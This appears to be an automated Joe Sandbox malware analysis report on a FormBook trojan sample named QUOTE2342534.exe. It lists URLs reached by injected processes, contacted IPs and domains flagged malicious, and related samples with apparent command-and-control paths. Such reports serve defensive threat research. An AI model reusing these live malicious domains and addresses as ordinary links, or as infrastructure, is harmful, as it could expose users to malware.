                                                                                                                                              https://www.coba168.info/?s=mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.coba168.info/wp-content/themes/hello-elementor/theme.min.css?ver=3.1.1mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.coba168.infomshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.coba168.info/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.coba168.info/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementomshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://schema.orgmshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.ecosia.org/newtab/mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://onlineblikjes.nl/?7Bohe=9B/xOqaHJLGzhK9mshta.exe, 00000008.00000002.4595178953.00000000058D0000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000004260000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://gmpg.org/xfn/11mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.coba168.info/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://schema.org/WPHeadermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.coba168.info/#/schema/logo/image/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.coba168.info/wp-includes/js/dist/hooks.min.js?ver=2810c76e705dd1a53b18mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://www.coba168.info/about-us/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.coba168.info/wp-content/uploads/2024/08/5.pngqnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://www.coba168.info/slot-online/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://www.coba168.info/comments/feed/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://www.rtpsilva4d.clickqnPyaKsYTE.exe, 0000000A.00000002.4597123623.0000000004D3B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://www.coba168.info/login/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://schema.org/WPFootermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://yoast.com/wordpress/plugins/seo/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://www.coba168.info/privacy-policy-2/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.coba168.info/xmlrpc.phpmshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.coba168.info/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.coba168.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://www.coba168.info/wp-content/uploads/2024/10/cropped-COBA-168-qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://www.coba168.info/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://www.coba168.info/wp-content/themes/hello-elementor/header-footer.min.css?ver=3.1.1mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.coba168.info/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://www.coba168.info/registermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refermshta.exe, 00000008.00000002.4595178953.0000000004466000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000002DF6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.coba168.info/wp-content/uploads/elementor/css/global.css?ver=1728530365mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://www.coba168.info/promotion/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://www.coba168.info/xmlrpc.php?rsdmshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://www.coba168.info/feed/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.3mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://www.coba168.info/wp-content/themes/hello-elementor/style.min.css?ver=3.1.1mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icomshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://www.coba168.info/wp-content/uploads/elementor/css/post-12.css?ver=1728540809mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://www.coba168.info/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://www.coba168.info/wp-content/plugins/wp-staging/assets/js/dist/wpstg-blank-loader.min.js?ver=6mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                https://app.ddgame168.online/utm-source/coba168-infoqnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  https://api.w.org/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://www.coba168.info/wp-content/plugins/elementor/assets/lib/animations/styles/bounce.min.css?vermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://www.coba168.info/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.23.2mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                      http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?vermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        https://www.coba168.info/wp-json/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://www.coba168.info/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.44mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://www.coba168.info/wp-content/uploads/elementor/css/post-8.css?ver=1728530364mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		unknown

                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              162.0.215.33
                                                                                                                                                                                                                                              		nieuws-july202491.sbsCanada
                                                                                                                                                                                                                                              		35893ACPCAtrue
                                                                                                                                                                                                                                              118.139.178.37
                                                                                                                                                                                                                                              		coba168.infoSingapore
                                                                                                                                                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                              129.226.176.90
                                                                                                                                                                                                                                              		www.xueerr.xyzSingapore
                                                                                                                                                                                                                                              		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                                                                                                                                                              213.249.67.10
                                                                                                                                                                                                                                              		www.onlineblikje.onlineNetherlands
                                                                                                                                                                                                                                              		42585METAREGISTRARNLtrue
                                                                                                                                                                                                                                              67.223.117.169
                                                                                                                                                                                                                                              		rtpsilva4d.clickUnited States
                                                                                                                                                                                                                                              		15189VIMRO-AS15189UStrue
                                                                                                                                                                                                                                              154.9.228.56
                                                                                                                                                                                                                                              		www.mcse.topUnited States
                                                                                                                                                                                                                                              		395800GBTCLOUDUStrue
                                                                                                                                                                                                                                              129.226.56.200
                                                                                                                                                                                                                                              		b1-3-r111.kunlundns.topSingapore
                                                                                                                                                                                                                                              		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                                                                                                                                                              154.7.176.67
                                                                                                                                                                                                                                              		www.putizhong.homesUnited States
                                                                                                                                                                                                                                              		174COGENT-174UStrue
                                                                                                                                                                                                                                              84.32.84.32
                                                                                                                                                                                                                                              		voidzero.techLithuania
                                                                                                                                                                                                                                              		33922NTT-LT-ASLTtrue
                                                                                                                                                                                                                                              209.74.64.190
                                                                                                                                                                                                                                              		www.royapop.onlineUnited States
                                                                                                                                                                                                                                              		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                                                                                                                                              3.33.130.190
                                                                                                                                                                                                                                              		huwin.clubUnited States
                                                                                                                                                                                                                                              		8987AMAZONEXPANSIONGBtrue

                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1541203
                                                                                                                                                                                                                                              Start date and time:2024-10-24 15:16:08 +02:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 11m 17s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:11
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:2
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:QUOTE2342534.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@11/7@16/11
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 75%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 97%
                                                                                                                                                                                                                                              • Number of executed functions: 136
                                                                                                                                                                                                                                              • Number of non-executed functions: 282
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                              • Execution Graph export aborted for target qnPyaKsYTE.exe, PID 1308 because it is empty
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              • VT rate limit hit for: QUOTE2342534.exe

                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              09:17:09API Interceptor1x Sleep call for process: QUOTE2342534.exe modified
                                                                                                                                                                                                                                              09:17:11API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                              09:17:56API Interceptor12201948x Sleep call for process: mshta.exe modified

                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              162.0.215.33r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.nieuws-july202491.sbs/rq5n/
                                                                                                                                                                                                                                              rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.nieuws-july202491.sbs/rq5n/
                                                                                                                                                                                                                                              z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.nieuws-july202491.sbs/rq5n/
                                                                                                                                                                                                                                              118.139.178.37Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                              • www.coba168.info/esd1/
                                                                                                                                                                                                                                              129.226.176.90PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.xueerr.xyz/uhl0/
                                                                                                                                                                                                                                              213.249.67.10PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.onlineblikje.online/wp9q/?74=Wcq5nto4Pys/VvLEf2lJ/6Zw/QsAH/mOKDhTh8E2UkIGdNowS/NkUBtnEOdEZ1QRI1rqIZGZ3d2iBtPWddII6c2xOxLt6j8Q/ledcZJmmPQke33bUPdbyjY=&jf=kjpL5
                                                                                                                                                                                                                                              PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.onlineblikje.online/mgmi/
                                                                                                                                                                                                                                              67.223.117.169PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.rtpsilva4d.click/zctj/
                                                                                                                                                                                                                                              PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.rtpsilva4d.click/zctj/
                                                                                                                                                                                                                                              154.9.228.56PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.mcse.top/kyiu/
                                                                                                                                                                                                                                              PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.mcse.top/kyiu/
                                                                                                                                                                                                                                              129.226.56.200COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.cdqjey8g.sbs/mwey/
                                                                                                                                                                                                                                              Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.dxfwrc2h.sbs/170y/

                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              www.royapop.onlinePO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.64.190
                                                                                                                                                                                                                                              PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.64.190
                                                                                                                                                                                                                                              PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.64.190
                                                                                                                                                                                                                                              CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.64.190
                                                                                                                                                                                                                                              www.onlineblikje.onlinePO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 213.249.67.10
                                                                                                                                                                                                                                              PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 213.249.67.10
                                                                                                                                                                                                                                              www.putizhong.homesrDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 154.7.176.67
                                                                                                                                                                                                                                              ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 154.7.176.67
                                                                                                                                                                                                                                              b1-3-r111.kunlundns.topCOMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 129.226.56.200
                                                                                                                                                                                                                                              Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 129.226.56.200
                                                                                                                                                                                                                                              www.xueerr.xyzPO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 129.226.176.90
                                                                                                                                                                                                                                              www.mcse.topPO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 154.9.228.56
                                                                                                                                                                                                                                              PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 154.9.228.56

                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              METAREGISTRARNLPO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 213.249.67.10
                                                                                                                                                                                                                                              PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 213.249.67.10
